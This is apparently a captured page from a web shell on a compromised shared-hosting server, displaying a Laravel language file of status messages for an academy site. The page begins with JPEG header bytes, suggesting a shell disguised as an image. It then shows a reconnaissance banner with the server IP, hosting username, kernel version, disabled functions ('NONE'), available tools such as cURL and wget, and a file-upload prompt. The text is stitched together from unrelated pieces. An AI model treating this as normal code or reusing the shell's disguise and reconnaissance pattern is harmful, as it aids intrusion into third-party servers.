����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.17.154.155 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/resources/lang/en/ |
Upload File : |
<?php return [ /* |-------------------------------------------------------------------------- | Authentication Language Lines |-------------------------------------------------------------------------- | | The following language lines are used during authentication for various | messages that we need to display to the user. You are free to modify | these language lines according to your application's requirements. | */ 'no_data_available' => 'No data available in table', 'status_changed' => 'Status successfully changed', 'updated' => ':title successfully updated', 'created' => ':title successfully created', 'deleted' => ':title successfully deleted', 'lecture_uploaded' => 'Lecture successfully uploaded', 'lecture_deleted' => 'Lecture successfully deleted', 'lecture_updated' => 'Lecture successfully updated', 'course_cant_delete_message' => 'You can not delete this course', 'are_you_really_want_to_delete_this' => 'Are you really want to delete this?', 'all_of_the_following_objects_and_their_related_items_will_be_deleted' => 'All of the following objects and their related items will be deleted:', ];